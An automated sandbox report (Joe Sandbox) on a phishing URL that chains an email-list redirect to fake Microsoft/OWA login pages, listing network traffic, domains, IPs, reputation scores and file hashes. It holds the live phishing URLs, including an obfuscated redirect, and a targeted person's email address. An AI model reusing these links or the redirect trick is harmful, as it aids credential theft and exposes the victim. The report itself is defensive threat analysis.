    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49741 version: TLS 1.2
    Source: classification engineClassification label: mal76.phis.win@21/24@24/11
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=1988,i,4335926418607435208,2097072706423955988,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20="
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=1988,i,4335926418607435208,2097072706423955988,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=0%Avira URL Cloudsafe
    https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=0%VirustotalBrowse
    https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=100%SlashNextCredential Stealing type: Phishing & Social Engineering
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    cs1227.wpc.alphacdn.net0%VirustotalBrowse
    33208b95.7187b59e75e5ee4922ee53c8.workers.dev3%VirustotalBrowse
    acctcdn.msftauth.net1%VirustotalBrowse
    24karat.us0%VirustotalBrowse
    logincdn.msftauth.net0%VirustotalBrowse
    part-0012.t-0009.t-msedge.net0%VirustotalBrowse
    sni1gl.wpc.alphacdn.net0%VirustotalBrowse
    fp2e7a.wpc.phicdn.net0%VirustotalBrowse
    bigswitch.co.in12%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://24karat.us/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzI0a2FyYXQudXMiLCJkb21haW4iOiIyNGthcmF0LnVzIiwia2V5IjoiRzBsbW84Q0VrYmk3IiwicXJjIjoiamdvbEBiZ2NsaW5pYy5jb20iLCJpYXQiOjE3MTExMTc0NDksImV4cCI6MTcxMTExNzU2OX0.s-ZTKIIMiAyWUPU--t4qvflYQNokE9Efj6w9WMo6whI0%Avira URL Cloudsafe
    https://24karat.us/owa/?login_hint=jgol%40bgclinic.com0%Avira URL Cloudsafe
    https://24karat.us/?qrc=jgol%40bgclinic.com0%Avira URL Cloudsafe
    http://bigswitch.co.in/favicon.ico100%Avira URL Cloudphishing
    https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg0%Avira URL Cloudsafe
    https://logincdn.msftauth.net/shared/5/js/login_en_4XWJLQsDnjOrefMiFTdF2g2.js0%Avira URL Cloudsafe
    https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/favicon.ico0%Avira URL Cloudsafe
    https://logincdn.msftauth.net/shared/5/chunks/oneds-analytics-js_c53074e74ebeb8e140d6_en.js0%Avira URL Cloudsafe
    https://24karat.us/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_GW4zPEKtwiiwtRHaCqGPVw2.js0%Avira URL Cloudsafe
    https://24karat.us?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzI0a2FyYXQudXMi0%Avira URL Cloudsafe
    https://logincdn.msftauth.net/shared/5/js/login_en_4XWJLQsDnjOrefMiFTdF2g2.js0%VirustotalBrowse
    https://logincdn.msftauth.net/shared/5/chunks/oneds-analytics-js_c53074e74ebeb8e140d6_en.js0%VirustotalBrowse
    https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    bigswitch.co.in
    69.49.245.172
    truefalseunknown
    24karat.us
    162.220.165.249
    truefalseunknown
    33208b95.7187b59e75e5ee4922ee53c8.workers.dev
    172.67.132.20
    truefalseunknown
    sni1gl.wpc.alphacdn.net
    152.195.19.97
    truefalseunknown
    challenges.cloudflare.com
    104.17.3.184
    truefalse
      high
      www.google.com
      142.251.40.164
      truefalse
        high
        cs1227.wpc.alphacdn.net
        192.229.211.199
        truefalseunknown
        part-0012.t-0009.t-msedge.net
        13.107.246.40
        truefalseunknown
        manage.kmail-lists.com
        54.242.173.168
        truefalse
          high
          fp2e7a.wpc.phicdn.net
          192.229.211.108
          truefalseunknown
          logincdn.msftauth.net
          unknown
          unknownfalseunknown
          acctcdn.msftauth.net
          unknown
          unknownfalseunknown
          NameMaliciousAntivirus DetectionReputation
          https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.comtrue
            unknown
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8686d7969ff38c8dfalse
              high
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8686d7969ff38c8d/1711117435475/87838355b32f03578a2010d5ec95bff9ab3c967b76019571c44cca83e4d48e46/SNU9Px4ZWVIK_59false
                high
                https://24karat.us/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzI0a2FyYXQudXMiLCJkb21haW4iOiIyNGthcmF0LnVzIiwia2V5IjoiRzBsbW84Q0VrYmk3IiwicXJjIjoiamdvbEBiZ2NsaW5pYy5jb20iLCJpYXQiOjE3MTExMTc0NDksImV4cCI6MTcxMTExNzU2OX0.s-ZTKIIMiAyWUPU--t4qvflYQNokE9Efj6w9WMo6whIfalse
                • Avira URL Cloud: safe
                unknown
                https://24karat.us/owa/?login_hint=jgol%40bgclinic.comfalse
                • Avira URL Cloud: safe
                unknown
                https://24karat.us/?qrc=jgol%40bgclinic.comfalse
                • Avira URL Cloud: safe
                unknown
                http://bigswitch.co.in/favicon.icofalse
                • Avira URL Cloud: phishing
                unknown
                http://bigswitch.co.in///////////portfolio////////wpfile///////////wp-user%E3%80%82////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=false
                  unknown
                  https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=false
                    high
                    https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svgfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalfalse
                      high
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8686d7969ff38c8d/1711117435474/PuCra0aeu8l9_kNfalse
                          high
                          https://challenges.cloudflare.com/turnstile/v0/b/de9364586261/api.js?onload=onloadTurnstileCallbackfalse
                            high
                            https://logincdn.msftauth.net/shared/5/js/login_en_4XWJLQsDnjOrefMiFTdF2g2.jsfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32false
                              high
                              https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/favicon.icofalse
                              • Avira URL Cloud: safe
                              unknown
                              https://logincdn.msftauth.net/shared/5/chunks/oneds-analytics-js_c53074e74ebeb8e140d6_en.jsfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://24karat.us/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_GW4zPEKtwiiwtRHaCqGPVw2.jsfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.opensource.org/licenses/mit-license.php)chromecache_61.2.drfalse
                                  high
                                  http://knockoutjs.com/chromecache_61.2.drfalse
                                    high
                                    https://github.com/douglascrockford/JSON-jschromecache_61.2.drfalse
                                      high
                                      https://24karat.us?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzI0a2FyYXQudXMichromecache_59.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      13.107.246.40
                                      part-0012.t-0009.t-msedge.netUnited States
                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      54.242.173.168
                                      manage.kmail-lists.comUnited States
                                      14618AMAZON-AESUSfalse
                                      69.49.245.172
                                      bigswitch.co.inUnited States
                                      46606UNIFIEDLAYER-AS-1USfalse
                                      172.67.132.20
                                      33208b95.7187b59e75e5ee4922ee53c8.workers.devUnited States
                                      13335CLOUDFLARENETUSfalse
                                      162.220.165.249
                                      24karat.usUnited States
                                      19318IS-AS-1USfalse
                                      192.229.211.199
                                      cs1227.wpc.alphacdn.netUnited States
                                      15133EDGECASTUSfalse
                                      104.17.3.184
                                      challenges.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      142.251.40.164
                                      www.google.comUnited States
                                      15169GOOGLEUSfalse
                                      239.255.255.250
                                      unknownReserved
                                      unknownunknownfalse
                                      104.17.2.184
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      IP
                                      192.168.2.4
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1414083
                                      Start date and time:2024-03-22 15:22:45 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 7s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:browseurl.jbs
                                      Sample URL:https://manage.kmail-lists.com/subscriΡtions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal76.phis.win@21/24@24/11
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 142.251.163.84, 142.251.32.110, 142.250.65.195, 34.104.35.123, 13.85.23.86, 104.102.251.17, 104.102.251.73, 104.102.251.80, 104.102.251.89, 13.85.23.206, 192.229.211.108, 20.3.187.198, 20.242.39.171, 142.250.81.227
                                      • Excluded domains from analysis (whitelisted): logincdn.msauth.net, lgincdnmsftuswe2.azureedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, acctcdn.msauth.net, acctcdn.trafficmanager.net, clients2.google.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, update.googleapis.com, acctcdnvzeuno.azureedge.net, acctcdnvzeuno.ec.azureedge.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, acctcdnmsftuswe2.azureedge.net, accounts.google.com, acctcdnmsftuswe2.afd.azureedge.net, lgincdnvzeuno.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, firstparty-azurefd-prod.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, lgincdnvzeuno.azureedge.net, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com
                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      No simulations
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65470)
                                      Category:downloaded
                                      Size (bytes):887551
                                      Entropy (8bit):5.418722467225116
                                      Encrypted:false
                                      SSDEEP:6144:4+WApOIxJhpHKlpmM1axRN8kReGmLCMGoY1KD+ylNYvb2ooTujY40dvYbD48qMQu:ZK8RekRWLCQ+0NiaUlEqd
                                      MD5:E175892D0B039E33AB79F322153745DA
                                      SHA1:284440C3C1A0767113260898B6BBC8EC21E35C4B
                                      SHA-256:1A4D3768384D0C5443F8187F67EE73A15C15A9281E7960F3F8F00C0DB17A7E7D
                                      SHA-512:6235C58433E167C1952E66ADB775881CE5B72D30F404F6C1EA71D5EA57C7E75E314072BED6D8E18942BDD63F19CDAD0F91EB68C6B258522922974C7A48B2DD7B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://logincdn.msftauth.net/shared/5/js/login_en_4XWJLQsDnjOrefMiFTdF2g2.js
                                      Preview:/*! For license information please see login_en.js.LICENSE.txt */.!function(){var e,t,n,r,o={97206:function(e,t,n){"use strict";var r=n(9384),o={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},i={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},l={};function s(e){return r.isMemo(e)?a:l[e.$$typeof]||o}l[r.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},l[r.Memo]=a;var c=Object.defineProperty,u=Object.getOwnPropertyNames,d=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,p=Object.getPrototypeOf,g=Object.prototype;e.exports=function e(t,n,r){if("string"!=typeof n){if(g){var o=p(n);o&&o!==g&&e(t,o,r)}var a=u(n);d&&(a=a.concat(d(n)));for(var l=s(t),m=s(n),h=0;h<a.length;++h){var b=a[h];if(!(i[b]||r&&r[b]
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                      Category:downloaded
                                      Size (bytes):61
                                      Entropy (8bit):3.990210155325004
                                      Encrypted:false
                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65436)
                                      Category:downloaded
                                      Size (bytes):90613
                                      Entropy (8bit):5.3296525719025665
                                      Encrypted:false
                                      SSDEEP:768:UVEDx3ySKZOP00d5TjMSYzSRRM1d0YjSRpUKHHacTItx7vtn1yC0JalF1rmq6Llj:U+0Z9yFrGi8SRGfyC0JalFx3gKaD
                                      MD5:8C23B3506E2A888DDE241C243149E71D
                                      SHA1:F2A4C763A4BF50A0FA212FAA0A14FE837B0741E6
                                      SHA-256:F6CA33591EFE5EAA905F49F5CB0D0643080DBC045865F02DC88F33DC7DDC7C33
                                      SHA-512:581DB58643509958DEBD85B5EB1CAC59DC7084BC99A647976AD2A3722A8E5836BA9C5EAF6E8EB27B768D8B5A4E52D46A936141188A92A0968CAE41DEFC17A5C8
                                      Malicious:false
                                      Reputation:low
                                      URL:https://logincdn.msftauth.net/shared/5/chunks/oneds-analytics-js_c53074e74ebeb8e140d6_en.js
                                      Preview:/*! For license information please see oneds-analytics-js_c53074e74ebeb8e140d6_en.js.LICENSE.txt */."use strict";(self.webpackChunk_msidentity_sisu_msa=self.webpackChunk_msidentity_sisu_msa||[]).push([[251],{41696:function(n,e,t){t.r(e),t.d(e,{AppInsightsCore:function(){return qo},ApplicationInsights:function(){return ja},BE_PROFILE:function(){return Vo},BaseTelemetryPlugin:function(){return di},Cloud:function(){return Vi},CoreUtils:function(){return Hr},Device:function(){return Xi},DiagnosticLogger:function(){return et},EventLatency:function(){return Ga},EventPersistence:function(){return Qa},EventsDiscardedReason:function(){return Ho},InternalAppInsightsCore:function(){return Ko},Loc:function(){return $i},LoggingSeverity:function(){return Wa},MinChannelPriorty:function(){return $a},NRT_PROFILE:function(){return Wo},NotificationManager:function(){return Uo},PostChannel:function(){return qa},PropertiesPlugin:function(){return Po},RT_PROFILE:function(){return jo},Session:function(){retu
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text
                                      Category:downloaded
                                      Size (bytes):315
                                      Entropy (8bit):5.0572271090563765
                                      Encrypted:false
                                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                      Malicious:false
                                      Reputation:low
                                      URL:http://bigswitch.co.in/favicon.ico
                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (3255), with no line terminators
                                      Category:dropped
                                      Size (bytes):3255
                                      Entropy (8bit):5.226026511992594
                                      Encrypted:false
                                      SSDEEP:48:0aXW4lNPkiWUZtbWYBc36yKrnVjbv8+qfOcqwFtiGNir98SKZyEk0s4tPA:dGeCUjtBcXanFISch+r98SKZdFsi4
                                      MD5:290FB76FF9CABDAE4224110B38984823
                                      SHA1:BD1CC2751CA589AA80196794ADBC85F9409FCD35
                                      SHA-256:912F47E24A961D903C8EDEBB5CB5AF4583408F50072CC398BAA143F894BE4EA0
                                      SHA-512:7AC94AFF39607795DE9FF10368772A19D0EEC061938541656164EBA0F42028805250337CFE3CAF97D6E4AFA1F476E868A68028D4B12C65E5A2DBE80E2274E3F5
                                      Malicious:false
                                      Reputation:low
